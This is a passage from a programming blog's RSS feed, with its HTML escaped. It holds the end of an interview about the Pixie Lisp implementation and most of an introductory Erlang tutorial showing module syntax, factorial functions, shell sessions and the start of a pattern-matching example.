Technically I implemented Pixie in RPython, which is a subset of Python that can be compiled to C with the PyPy translation tool-chain. The reason I chose RPython instead of C really comes down to the PyPy tool-chain’s feature set. Namely it supports a GC out-of-the-box, and if you write an interpreter in RPython you can put a few hints in the code, and it’ll spit out a JIT for that interpreter. This has saved me countless hours of work.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How does Pixie compare to Clojure?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
Since Pixie implements its own VM, it’s different in many ways. We don’t claim that Pixie is a “Clojure port”, as that locks us into following Clojure in all ways. Instead we take inspiration from Clojure, keep what we like, discard what we don’t, and improve what we can.&lt;&#x2F;p&gt;
&lt;p&gt;Performance-wise, Pixie can be faster than Clojure in some areas, mostly around boxing, as Pixie can remove boxing in tight loops, even when using transducers, or other higher-order-functions. However our GC is way less mature than the JVM GC, so I wouldn’t expect it to out-perform Clojure in all (or even most) cases.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What can experienced Lisp users expect from Pixie?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
First, Pixie is fast. Really fast. We can obtain the performance normally only found in a compiled language, while remaining completely dynamic. We also have a complete set of immutable data structures, including vectors and hash maps. So perhaps the best way to describe it is: Clojure with the lightweight feel of Python.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;When do you plan to release a stable version?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
That’s TBD, probably not until early&#x2F;mid 2015, when the language stabilizes a bit. Also I’d like to release the first version with full support for Windows, something we haven’t even started yet.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Were there other experimental languages you worked on previous to Pixie?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
Probably one of the best known projects was &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;halgari&#x2F;clojure-py&quot;&gt;clojure-py&lt;&#x2F;a&gt;, which was a port of Clojure to the Python VM. But I’ve been working on languages most of my life. In fact, the first language I ever wrote was when I was in high school. It was a small interpreted language named &lt;em&gt;PhaLinks&lt;&#x2F;em&gt; and was terrible, but I learned a lot from the effort. I also acquired a distaste for parsers in the process. Which, incidentally, is why I stick with Lisp these days: Lisp parsers are super easy to write.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Do you think that developing Pixie made you a better programmer?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
Of course, if you’re not learning something every day of your life, you’re doing something wrong.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What difficulties are associated with designing a programming language from scratch?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
One of the biggest is figuring out the right balance between performance and desired features. Many times in the development of Pixie I’ve wanted to add a certain feature, but then found out that if I tweaked it a bit, it’d be much faster. So now there’s a choice to be made: do you have the perfect language, written exactly the way you want, or something that performs much better but lacks some cool feature?&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What reading material do you recommend for implementing your first programming language?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
I recommend googling for tutorials like “writing a Lisp in X” or “writing a simple Forth”, and going from there. Also, read the source code from other languages. I learned most of what I know of language development simply by reading papers online, and studying source code of existing projects.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Become an Erlang Cowboy and tame the Wild Wild Web — Part I</title>
          <pubDate>Wed, 18 Jun 2014 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/become-an-erlang-cowboy-and-tame-the-wild-wild-web-part-i/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/become-an-erlang-cowboy-and-tame-the-wild-wild-web-part-i/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/become-an-erlang-cowboy-and-tame-the-wild-wild-web-part-i/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;2025&#x2F;12&#x2F;1-kQjlW-vovZA1YmfxPHC5YQ.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h4 id=&quot;erlang-from-zero-to-coding-a-commenting-system&quot;&gt;Erlang: From zero to coding a commenting system&lt;&#x2F;h4&gt;
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;objective&quot;&gt;Objective&lt;&#x2F;h4&gt;
&lt;p&gt;In the following series of posts we will be creating a commenting system like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;disqus.com&#x2F;&quot;&gt;http:&#x2F;&#x2F;disqus.com&#x2F;&lt;&#x2F;a&gt;. The system will have normal HTTP&#x2F;REST handlers but also some SSE and websockets handlers, and background jobs for uploading images to Amazon S3 and sending push notifications to iOS and Android clients via Amazon SNS. At the end of the series, we will connect Erlang and the system with other programming languages for those tasks that can be more difficult to do with Erlang.&lt;&#x2F;p&gt;
&lt;p&gt;By no means will this be an attempt to create a new reference for learning the syntax, types and functions of the language. There are already three great books that cover that purpose:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Erlang Programming — Francesco Cesarini and Simon Thompson&lt;&#x2F;li&gt;
&lt;li&gt;Programming Erlang: Software for a Concurrent World — Joe Armstrong&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;learnyousomeerlang.com&#x2F;&quot;&gt;Learn you some Erlang for Great Good — Fred Hébert&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;At some point you will need to read them if you want to work with Erlang. My objective is to create a “Hands on Erlang” guide, and hopefully a small book, where we use the most important and useful Erlang concepts to create a working, real system so that you can see for yourself how highly scalable, concurrent, parallelizable, battle-proof and, especially, how well designed the Erlang platform is. I separate the Erlang language from its platform, even though they are intertwined, because you could change Erlang’s syntax, or use another language that runs on top of the BEAM like Elixir or LFE (Lisp Flavored Erlang), and still get almost all, if not all, of the Erlang benefits, and even some more.&lt;&#x2F;p&gt;
&lt;p&gt;Don’t get me wrong. I really like the language per se. But its real power comes from its ecosystem and from the system in general. From my point of view, C++, Java, C#, Objective-C, Python, Ruby and even JavaScript are very similar. Sure, they have different syntaxes and slightly different ways of doing the same thing. But you do not have to learn a new way of thinking when changing from one to another. You can learn the syntax of the Erlang language in only a few hours, but you will not be able to learn the concurrent&#x2F;fault-tolerant paradigm in one day. Nobody learned the object-oriented paradigm in that span of time. If you are looking to learn a new syntax or a new Rails-like framework, you have come to the wrong place.&lt;&#x2F;p&gt;
&lt;p&gt;If you are interested in moving out of your comfort zone, you have come to the right place. I will do my best to help you learn a new and different way of thinking and designing applications. The length of the journey, however, will depend entirely on your will. You will have to play, reimplement the same idea in different ways and, obviously, fight with a new compiler to conquer victory.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;audience&quot;&gt;Audience&lt;&#x2F;h4&gt;
&lt;p&gt;This series of posts is oriented towards developers that need to create backend servers and normally use languages and frameworks such as Python and Flask, Twisted, Celery; Ruby and Rails&#x2F;Sinatra&#x2F;Grape, Sidekiq&#x2F;Resque, Concurrent Ruby with JRuby or Rubinius; JavaScript with Node.js, Express&#x2F;Koa; or Go. I have worked with these technologies for some years, creating HTTP servers that produced JSON consumed by single-page applications, iOS and Android clients. I was very comfortable with them. But for the last year I have been using Erlang, and even if I still like Ruby, Python and JavaScript, I have no regrets when I say that Erlang is superior, in most areas, for building these types of systems.&lt;&#x2F;p&gt;
&lt;p&gt;My idea is to show how easily and cleanly you can create a distributed, resilient system thanks to Erlang semantics, its awesome BEAM virtual machine and some great libraries like Cowboy. If I cannot convince you to use Erlang on your next project, then I hope that at least you respect its awesome power.&lt;&#x2F;p&gt;
&lt;p&gt;On this first post I will show you some basic Erlang code so that in next one I can start working on the first handlers of our system.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;requirements&quot;&gt;Requirements&lt;&#x2F;h4&gt;
&lt;ul&gt;
&lt;li&gt;Erlang 17 installed. Check &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.erlang-solutions.com&#x2F;downloads&#x2F;download-erlang-otp&quot;&gt;Erlang Solutions downloads page&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;robots.thoughtbot.com&#x2F;back-to-basics-http-requests&quot;&gt;Basic http&lt;&#x2F;a&gt; knowledge&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Before starting I must say that I am very thankful to my employer —&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;inaka.net&#x2F;&quot;&gt;Inaka&lt;&#x2F;a&gt; — for letting me write part of these posts during my working hours.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;the-ugly-duckling&quot;&gt;The ugly duckling?&lt;&#x2F;h3&gt;
&lt;p&gt;Programming languages have a defined set of goals. Most of them put &lt;strong&gt;performance&lt;&#x2F;strong&gt;, &lt;strong&gt;developer expressiveness&lt;&#x2F;strong&gt; or &lt;strong&gt;developer productivity&lt;&#x2F;strong&gt; at the top of the list. Let’s see what they have to say about themselves so that we can compare them with Erlang’s description:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Rust&lt;&#x2F;strong&gt; is a systems programming language that &lt;strong&gt;runs blazingly fast&lt;&#x2F;strong&gt;, &lt;strong&gt;prevents almost all crashes&lt;&#x2F;strong&gt;, and eliminates data races. — &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.rust-lang.org&#x2F;&quot;&gt;http:&#x2F;&#x2F;www.rust-lang.org&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Java&lt;&#x2F;strong&gt; is designed to enable development of portable, &lt;strong&gt;high-performance applications&lt;&#x2F;strong&gt; for the widest range of computing platforms possible. — &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.java.com&#x2F;en&#x2F;about&#x2F;&quot;&gt;https:&#x2F;&#x2F;www.java.com&#x2F;en&#x2F;about&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-EPh-KvfabwINW5psttwbig.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Haskell&lt;&#x2F;strong&gt; is an advanced purely-functional programming language. An open-source product of more than twenty years of cutting-edge research, &lt;strong&gt;it allows rapid development of robust, concise, correct software&lt;&#x2F;strong&gt;. With strong support for integration with other languages, built-in concurrency and parallelism, debuggers, profilers, rich libraries and an active community, Haskell makes it easier to produce flexible, maintainable, high-quality software. — &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.haskell.org&#x2F;haskellwiki&#x2F;Haskell&quot;&gt;http:&#x2F;&#x2F;www.haskell.org&#x2F;haskellwiki&#x2F;Haskell&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Python&lt;&#x2F;strong&gt; is a programming language that lets you &lt;strong&gt;work quickly&lt;br &#x2F;&gt;
and integrate systems more effectively&lt;&#x2F;strong&gt;. — &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.python.org&#x2F;&quot;&gt;https:&#x2F;&#x2F;www.python.org&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Ruby&lt;&#x2F;strong&gt; is a &lt;strong&gt;dynamic&lt;&#x2F;strong&gt;, open source programming language with a &lt;strong&gt;focus on simplicity and productivity&lt;&#x2F;strong&gt;. It has an &lt;strong&gt;elegant syntax that is natural to read and easy to write&lt;&#x2F;strong&gt;. — &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.ruby-lang.org&#x2F;en&#x2F;&quot;&gt;https:&#x2F;&#x2F;www.ruby-lang.org&#x2F;en&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;The only reliable plan is to design for performance. Performance doesn’t mean speed; that’s taking the metaphor too literally. Speed counts, but a programming language is first of all a tool for thinking in. We want thinking in &lt;strong&gt;Arc&lt;&#x2F;strong&gt; to &lt;strong&gt;feel like driving a 911&lt;&#x2F;strong&gt;. — &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.paulgraham.com&#x2F;design.html&quot;&gt;http:&#x2F;&#x2F;www.paulgraham.com&#x2F;design.html&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-ezjVLCDsv-Qur7C2BvhnsQ.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;strong&gt;1973 Porsche 911E&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;The &lt;strong&gt;Go&lt;&#x2F;strong&gt; programming language is an open source project to &lt;strong&gt;make programmers more productive&lt;&#x2F;strong&gt;. Go is &lt;strong&gt;expressive, concise, clean, and efficient&lt;&#x2F;strong&gt;. Its concurrency mechanisms make it &lt;strong&gt;easy to write programs that get the most out of multicore and networked machines&lt;&#x2F;strong&gt;, while its novel type system enables flexible and modular program construction. Go compiles quickly to machine code yet has the convenience of garbage collection and the power of run-time reflection. It’s a &lt;strong&gt;fast, statically typed, compiled language that feels like a dynamically typed, interpreted language&lt;&#x2F;strong&gt;. — &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;golang.org&#x2F;doc&#x2F;&quot;&gt;http:&#x2F;&#x2F;golang.org&#x2F;doc&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;Let’s see what Erlang has to say about itself:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Erlang&lt;&#x2F;strong&gt; is a programming language &lt;strong&gt;used to build massively scalable soft real-time systems with requirements on high availability.&lt;&#x2F;strong&gt; Some of its uses are in telecoms, banking, e-commerce, computer telephony and instant messaging. Erlang’s runtime system has built-in support for concurrency, distribution and fault tolerance. — &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.erlang.org&#x2F;&quot;&gt;http:&#x2F;&#x2F;www.erlang.org&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;Erlang seems to be the ugly duckling compared to other programming languages since it doesn’t describe itself as being fast, clean or expressive.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-qV-Mz3gUxyM1Ug0XANoZgg.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Erlang was created for building fault-tolerant systems. This is natural, since Erlang’s roots are in the telecommunications world. The most important design choices in the language were made to fulfill this requirement. However, this does not mean it is not clean or expressive. Let’s take a closer look.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;syntax&quot;&gt;Syntax&lt;&#x2F;h3&gt;
&lt;p&gt;The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;erlang&#x2F;otp&#x2F;blob&#x2F;maint&#x2F;lib&#x2F;stdlib&#x2F;src&#x2F;erl_parse.yrl#L-0-L-535&quot;&gt;Erlang grammar&lt;&#x2F;a&gt; is simple: it is fewer than 550 lines of code. That makes Erlang syntax easy to understand, even if it is different from mainstream languages. More importantly, it is really consistent. Enough talk:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% this is a comment&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;-module(foo).     %% we define a module called foo&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;-export([bar&#x2F;0]). %% and export the function bar that has 0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                  %% arguments&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;bar() -&amp;gt;          %% we define the function bar&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; io:format(&amp;quot;Hello World!~n&amp;quot;).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Let’s compile it and, inside the Erlang shell, run the bar function from the module foo.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;$ erlc foo.erl &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;$ erl          &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;1&amp;gt; foo:bar().  %% we call the bar function&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Hello World!&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;ok&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Let me show you an example that is a little more complex:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;-module(test).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;-compile(export_all).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% factorial implemented as you would normally do in most&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% imperative languages.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fac_if(N) -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  if &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    N =:= 0 -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    true -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      N * fac_if(N - 1)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  end.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% factorial implemented with a case. if N matches 0 it&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% returns 1. If N matches any other value it will call&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% fac_case with N-1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fac_case(N) -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  case N of&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    0 -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    N -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      N * fac_case(N - 1)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  end.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% factorial implemented with function clauses&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fac(0) -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fac(N) -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  N * fac(N - 1).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
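&lt;p&gt;A fourth variant, not in the module above, sketches the same function with a guard in the function head, so that a negative argument fails fast instead of recursing forever:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% factorial with a guard; fac_guard(-1) fails with a&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;%% function_clause error instead of looping forever&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fac_guard(0) -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fac_guard(N) when N &amp;gt; 0 -&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  N * fac_guard(N - 1).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;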
&lt;p&gt;Now let’s save it as test.erl, compile it and start the Erlang shell:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;$ erlc test.erl&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;$ erl &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The last case uses something called pattern matching in the function head; you will learn more about pattern matching shortly. Now we can call the fac function:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;2&amp;gt; test:fac(20).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;2432902008176640000&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;3&amp;gt; test:fac(40). &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;815915283247897734345611269596115894272000000000&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The syntax is not difficult; it is just different from Algol- or C-based syntax. As you will see, there are not many reserved words or language constructs. I think only Lisps are simpler from the syntax and grammar point of view.&lt;&#x2F;p&gt;
&lt;p&gt;I wanted to add that, as you have noticed, Erlang uses “&lt;strong&gt;,&lt;&#x2F;strong&gt;”, “&lt;strong&gt;;&lt;&#x2F;strong&gt;” and “&lt;strong&gt;.&lt;&#x2F;strong&gt;” as terminators. I am not a big fan of them, since I have to change them when moving lines of code up or down. In general I like indentation a la Python as a way to delimit blocks of code. However, Erlang terminators are not a big pain in the a** once you get used to them. I also agree with Robert Virding, co-creator of Erlang, that Erlang syntax is small, simple, regular and concise. It is difficult not to agree with that, even if you do not like Erlang syntax. All the mainstream languages I have used (e.g. C++, Java, C# or Objective-C) have a much more complex and less consistent syntax. Returning to the terminator issue, Fred Hebert has a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;ferd.ca&#x2F;on-erlang-s-syntax.html&quot;&gt;great article&lt;&#x2F;a&gt; with some tips on how to use and read them.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s move onto more important things:&lt;&#x2F;p&gt;
&lt;h3 id=&quot;expressiveness&quot;&gt;Expressiveness&lt;&#x2F;h3&gt;
&lt;p&gt;When thinking about Erlang expressiveness, the first things that come to mind are message passing and process creation and management. Nevertheless, pattern matching is a big player in this field too, and it goes a long way towards making receiving messages easier. Let’s start with a simple example of pattern matching before moving on to message passing and process management.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;4&amp;gt; Body.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;* 1: variable &amp;#39;Body&amp;#39; is unbound&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;5&amp;gt; Headers.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;* 1: variable &amp;#39;Headers&amp;#39; is unbound&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;First we tried to access the content of the Body and Headers variables (all variables in Erlang must start with a capital letter). The shell answers with the obvious: the variables are unbound. Now it is time to do something more interesting.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Exit the shell we have been using up to now by pressing Control-C twice. Since we are going to use an HTTP library (ibrowse) in the following example, instead of setting everything up by hand, clone this project skeleton:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
